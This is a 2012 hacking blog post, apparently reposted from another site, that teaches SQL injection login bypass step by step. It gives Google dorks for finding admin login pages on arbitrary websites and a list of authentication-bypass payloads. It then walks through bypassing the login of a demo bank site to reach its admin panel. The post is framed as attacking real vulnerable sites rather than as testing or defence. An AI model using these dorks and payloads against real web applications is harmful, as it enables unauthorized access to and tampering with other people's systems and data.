Pages

Thursday, August 16, 2012

How to exploit web application by SQL Injection Attack


Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries.

                      

What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.



Step-by-Step tutorial for SQL Injection                          
  
[Step – 1] Find SQL Injection Vulnerable Website


First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.

1) By Google Dork

Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.

There is a large number of Google dork for basic SQL injection. Here is the best:


inurl:admin.asp

inurl:login/admin.asp

inurl:admin/login.asp

inurl:adminlogin.asp

inurl:adminhome.asp

inurl:admin_login.asp

inurl:administratorlogin.asp

inurl:login/administrator.asp

inurl:administrator_login.asp






2) By Automated Tools

Today many tools are available for found a vulnerable site. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password. “Actually finding admin page is nothing but just a directory of a particular website“.

You can use Admin Finder Script (Perl Script). I share this script in my previous post. You can get this script and see the tutorial.




[Step - 2] SQL Injection Queries

Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.


‘or’’=’

admin'--

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -- 


[Step – 3] Exploitation Web Applications by SQL Injection

After find admin page of any vulnerable web application. We can exploit that vulnerable web application using client supplied SQL queries. Its enable to execute unauthorized SQL commands.

For example, when a user logs onto a webpage by using user name and password for validation, a SQL query is used there. However an attacker can use SQL\ injection to send specially crafted username and password fields that poison the original SQL queries.


Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a sql vulnerable website

http://demo.testfire.net/bank/login.aspx .

We found an SQL injection point for exploitation. In the image below we can see login page or user authentication form of this web site.

 

Click Here to see This Page

www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user. 

The query has the following format:


SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'






The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.


The authentication requires the user to enter a valid username and password. We don’t know the valid user name and password. We inject here some SQL queries to bypass login. In username filed we type admin as a username and in password filed we set “or”=”

The query has the following format:


SELECT *
FROM admin
WHERE username = 'admin' AND password = '’or’’=’'





If the query runs successfully we will bypass the login without knowing username and password. In the below Image we can see we bypass login and we use admin panel as an administrator. We manage website contains as we want.





* In My next post we will discuss about Blind SQL Injection.
source : http://www.invisiblehackers.in

No comments:

Post a Comment